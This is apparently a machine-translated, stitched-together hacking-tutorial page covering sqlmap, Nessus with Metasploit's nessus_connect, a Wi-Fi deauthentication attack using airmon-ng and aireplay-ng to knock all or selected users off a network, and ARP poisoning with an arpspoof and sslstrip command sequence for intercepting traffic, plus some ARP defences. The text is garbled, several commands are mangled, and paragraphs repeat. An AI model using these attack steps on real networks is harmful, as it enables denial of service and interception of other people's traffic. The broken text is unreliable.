sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.It comes with a powerful detection engine, many niche features for maximum penetration tester and a broad range of switches lasting fingerprint database, more data Search the database to access the file system underlying and executing commands on the operating system via out-of-band connections.
Nessus: For security professionals that evaluate complex business networks for security breaches and compliance issues, Nessus is vulnerability of the world's most widely deployed and evaluation of product configurations.With over five million downloads to date, Nessus features high-speed discovery, configuration auditing, asset profile, sensitive data discovery, integration of patch management, and vulnerability analysis of your position Safety.Nessus scanners can be distributed throughout the enterprise, in DMZ, and through physically separated networks. Nessus is supported by a team of world-renowned research and has the largest base possible knowledge vulnerability, making it suitable for more complex environments.
Source: http://www.tenable.com/products/nessus
Video tutorial:
http://www.youtube.com/watch?v=HrKoHx7LuZM&feature=plcp
Nessus commands: nessus_admin nessus_save nessus_connect nessus_scan_new nessus_db_scan nessus_scan_pause nessus_help nessus_scan_pause_all nessus_index nessus_scan_resume nessus_logout nessus_scan_resume_all nessus_plugin_details nessus_scan_status nessus_plugin_family nessus_scan_stop nessus_plugin_list nessus_scan_stop_all nessus_plugin_prefs nessus_server_feed nessus_policy_del nessus_server_prefs nessus_policy_list nessus_server_status nessus_report_del nessus_template_list nessus_report_get nessus_user_add nessus_report_host_detail nessus_user_del nessus_report_host_ports nessus_user_list nessus_report_hosts nessus_user_passwd nessus_report_list Come see the show just have msf enter the name of the command line example:
msf> nessus_connect [*] Usage: [*] Nessus_connect username: password @ hostname: port <ssl ok> [*] Example:> nessus_connect msf: msf@192.168.1.10: 8834 ok [*] OR [*] Nessus_connect username @ hostname: port <ssl ok> [*] Example:> nessus_connect msf@192.168.1.10: 8834 ok [*] OR [*] Nessus_connect hostname: port <ssl ok> [*] Example:> 192.168.1.10:8834 nessus_connect ok [*] OR [*] Nessus_connect [*] Example:> nessus_connect [*] This only works after You have saved creds with nessus_save msf>
In this tutorial I come to bring as knocking over a wireless network by performing a DDoS good for this nececitaremos acer wireless cardthat will help us to audit wireless acer as we used to crack WEP networks, nececitaremos also have the aireplay and especially good use Linux jejejej because here I leave the explanation to be guided on how a DDoS acer manually to a network connection and below I leave a script.sh to make this attack but his explanation automated greetings await your response
1-We put the network card in monitor mode with the command: airmon-ng start wlan0
2-We look at the access point channel and put the channel in monitor mode with the command: airmon-ng mon0-c 5 5 is the channel number and mon0 is the interface.
3-If we knock down entire wireless network deauthentication packets sent by an access point with this command tumbamos the whole wireless network without internet allowing all users connected to it aireplay-ng -0 0-a 00:11:22: 33:44:55 00:11:22:33:44:55 mon0 which would have to be the mac address of the access point and wireless network interface mon0.
4-If you just want to knock down a client connected to the Wifi network deauthentication packets sent to a specific client with this command GROUNDED tumbamos the internet wireless customer leaving aireplay-ng -0 0-a 00:11:22:33:44 : 55-c 55:44:33:22:11:00 00:11:22:33:44:55 mon0 which would have to be the mac address of the access point and wireless network 55:44:33:22 11:00 would be the mac address of the client and interface mon0.
* Here I leave the script to all this automated attack agan ...
ARP is a layer 2 protocol link.ARP protocolwill be responsible for obtaining physical MAC addresses from IP addresses.In this type of network is necessary to know the destination MAC so that only the packet reaches the corresponding network interface and not another.
As noted, the concept of ARP only makes sense if we are in the field of switched networks, otherwise it would not be necessary to know the destination MAC in the network.
ARP Poisoning
The ARP poisoning, also known as ARP Poisoning or ARP Poison Routing is a technique used to infiltrate a LAN.
How does it work?
The principle ARP poisoning is to send fake ARP messages (spoofed) to the Ethernet.Usually the aim is to associate the attacker's MAC address with the IP address of another node (the node attacked), such as the defaultgateway (gateway).Any traffic to the IP address of that node, will be mistakenly sent to the attacker, rather than to its actual destination.The attacker can then choose among forward traffic to the actual default gateway (passive attack or listening), or modify the data before forwarding (active attack).The attacker can even launch an attack DoS (Denial of Service) against a victim by associating a nonexistent MAC address with the IP address of the default gateway of the victim.
Defense methods
A method to prevent ARP spoofing is the use of static ARP tables, ie add static ARP entries, so that there is no dynamic cache, each table entry maps a MAC address to its corresponding IP address.However, this is not a practical solution, especially in large networks.
In large networks it is preferable to use another method: the DHCP snooping.Using DHCP, the network device keeps track of the MAC addresses that are connected to each port, so that quickly detects if it receives a ARP spoofing.This method is implemented in the network equipment manufacturers such as Cisco, Extreme Networks and Allied Telesis.
Arpwatch is a Unix program that listens on the network ARP replies, and sends an email notification to the administrator of the network, when an ARP entry changes.
RARP ("Reverse ARP" or reverse ARP) is the protocol used to access, from a MAC address, your IP address.If response to a question, RARP returns more than one IP address, it means that MAC address has been cloned.
Video Tutorial:
Commands Back | Track: echo 1> / proc/sys/net/ipv4/ip_forward iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT - to-port 1000 sslstrip-p-l 1000 / another window tail-f sslstrip.log arpspoof-i wlan0-t IP - Door link
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for maximum penetration tester and a broad range of switches lasting fingerprint database, more data Search the database to access the file system underlying and executing commands on the operating system via out-of-band connections.
In this tutorial I come to bring as knocking over a wireless network by performing a DDoS good for this nececitaremos acer wireless cardthat will help us to audit wireless acer as we used to crack WEP networks, nececitaremos also have the aireplay and especially good use Linux jejejej because here I leave the explanation to be guided on how a DDoS acer manually to a network connection and below I leave a script.sh to make this attack but his explanation automated greetings await your response
